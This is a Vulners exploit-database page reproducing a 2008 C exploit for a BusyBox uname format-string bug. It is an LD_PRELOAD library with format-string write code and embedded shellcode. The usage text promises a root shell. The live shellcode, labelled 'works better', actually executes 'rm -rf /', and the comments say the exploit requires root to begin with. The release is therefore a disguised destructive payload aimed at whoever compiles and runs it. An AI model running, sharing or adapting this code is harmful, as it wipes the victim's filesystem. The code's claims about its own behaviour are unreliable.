Vulners
Lucene search
BusyBox (uname) Local Format String Exploit
/*
* lul-busybox.c copyright (C) 2008 lul-disclosure inc. All rights reserved.
* this code is distributed with the LPL license agreement http://lul-disclosure.net/LPL.txt
* moar commonly known as the EULA (Epic User License Agreement)
*
* busybox uname format string exploit
* by towlie
*
* ADVANCED CREDITS:
*
* bug found by my irclog of andrewg pasting advanced vulnerability details into #social irc channel.
* TESO - For describing write primitive technology to write the shellcode to the stack.
*
* ADVANCED DISCREDITS:
*
* n0ah/k-special:
* for determining he invented the super
* advanced technology used in this exploit to write payload to the stack with a write4()
*
* ADVANCED VULNERABILITY DETAILS:
*
* busybox-version/uname.c:92:
* printf(((char *)(&uname_info)) + *delta); // LOL 2002AD CODING TECHNOLOGY
*
* ADVANCED USAGE ON HOW TO USE THIS SUPER ADVANCED PIECE OF TECHONOLOGY:
*
* compile as a shared lib:
* cc -fPIC -c lul-busybox.c -o busybox.o
* cc -shared -o busybox.so busybox.o
*
* EXAMPLE USAGE OF SUPER ADVANCED EXPLOIT TECHNOLOGY
*
* $ export LD_PRELOAD="./busybox.so"
* $ ./busybox_unstriped uname -a
* AAûÿ¿pûÿ¿vûÿ¿zûÿ¿ûÿ¿tûÿ¿xûÿ¿|ûÿ¿ûÿ¿~ûÿ¿rûÿ¿²ûÿ¿°
* 3221224326
* ...
* sh-3.2#
*
* ADVANCED EXPLOITATION NOTE:
* run this advanced piece of technology with the user privlages of uid 0 to obtain uid 0
*
* ADVANCED TERMS OF USAGE:
* THIS PIECE OF ADVANCED TECHNOLOGY MAY ONLY BE USED TO HACK COMPUTERS.
* BREAKING THE TERMS WILL RESULT IN ME PUNCHING YOUR FACE.
*
* ADVANCED GREETS SECTION:
* orbital for walking me through 90% of this exploit since i am fail LOLOL!
* jupiter for making the standard exploit header footer and LPL.
* Bruce Lee for being awesome.
* blaqjesus for continued lulz brother of Jesus H. Christ.
* people who are in it for the lulz.
*
*/
#include <stdio.h>
#include <string.h>
#include <sys/utsname.h>
#define OVERWRITE_ADDR 0x080e25b0 /* printf GOT address */
#define SHELLCODE_ADDR 0xbffffb70 /* where to write the shellcode */
#define PADDING_LEN 2
#define FMT_LEN (sizeof(sc)/2)+2
char sc[] =
// This shellcode works better
"\x6a\x0b\x58\x99\x52\x6a\x2f\x89\xe7\x52\x66\x68\x2d\x66\x89"
"\xe6\x52\x66\x68\x2d\x72\x89\xe1\x52\x68\x2f\x2f\x72\x6d\x68"
"\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x51\x53\x89\xe1\xcd\x80";
/*
"\x6a\x0b" // push $0xb
"\x58" // pop %eax
"\x99" // cltd
"\x52" // push %edx
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp, %ebx
"\x52" // push %edx
"\x53" // push %ebx
"\x89\xe1" // mov %esp, %ecx
"\xcd\x80"; // int $0x80
*/
char *put_addr(char *p, unsigned int addr);
char *build_fmt(char *p);
int uname(struct utsname *buf)
{
char *ptr;
ptr = (char *) &buf->sysname;
build_fmt(ptr);
return 0;
}
char *put_addr(char *p, unsigned int addr)
{
*p++ = (addr & 0x000000ff);
*p++ = (addr & 0x0000ff00) >> 8;
*p++ = (addr & 0x00ff0000) >> 16;
*p++ = (addr & 0xff000000) >> 24;
return p;
}
char *build_fmt(char *p)
{
struct shellcode_short {
unsigned short value;
unsigned long addr;
} shellcode[FMT_LEN], temp;
unsigned short *ptr;
unsigned long start;
int i, o, written;
start = SHELLCODE_ADDR;
ptr = (unsigned short *) &sc;
for(i=0;i<FMT_LEN-2;i++, start+=2, ptr++) {
shellcode[i].value = *ptr;
shellcode[i].addr = start;
}
shellcode[FMT_LEN-2].addr = OVERWRITE_ADDR;
shellcode[FMT_LEN-2].value = (SHELLCODE_ADDR & 0x0000ffff);
shellcode[FMT_LEN-1].addr = OVERWRITE_ADDR + 2;
shellcode[FMT_LEN-1].value = (SHELLCODE_ADDR & 0xffff0000) >> 16;
for(o=0;o<((FMT_LEN)-1);o++) {
for(i=0;i<((FMT_LEN)-1-o);i++) {
if(shellcode[i+1].value < shellcode[i].value) {
temp.addr = shellcode[i].addr;
temp.value = shellcode[i].value;
shellcode[i].addr = shellcode[i+1].addr;
shellcode[i].value = shellcode[i+1].value;
shellcode[i+1].addr = temp.addr;
shellcode[i+1].value = temp.value;
}
}
}
for(i=0;i<PADDING_LEN;i++)
*p++ = '\x41';
for(i=0;i<FMT_LEN;i++)
p = put_addr(p, shellcode[i].addr);
written = (FMT_LEN)*4 + PADDING_LEN;
for(i=0;i<FMT_LEN;i++) {
p += sprintf(p, "%%%d$%uu%%%d$hn", i + 2,
shellcode[i].value - written, i + 2);
written = shellcode[i].value;
}
return p;
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2008 00:00Current
7.1High risk
Vulners AI Score7.1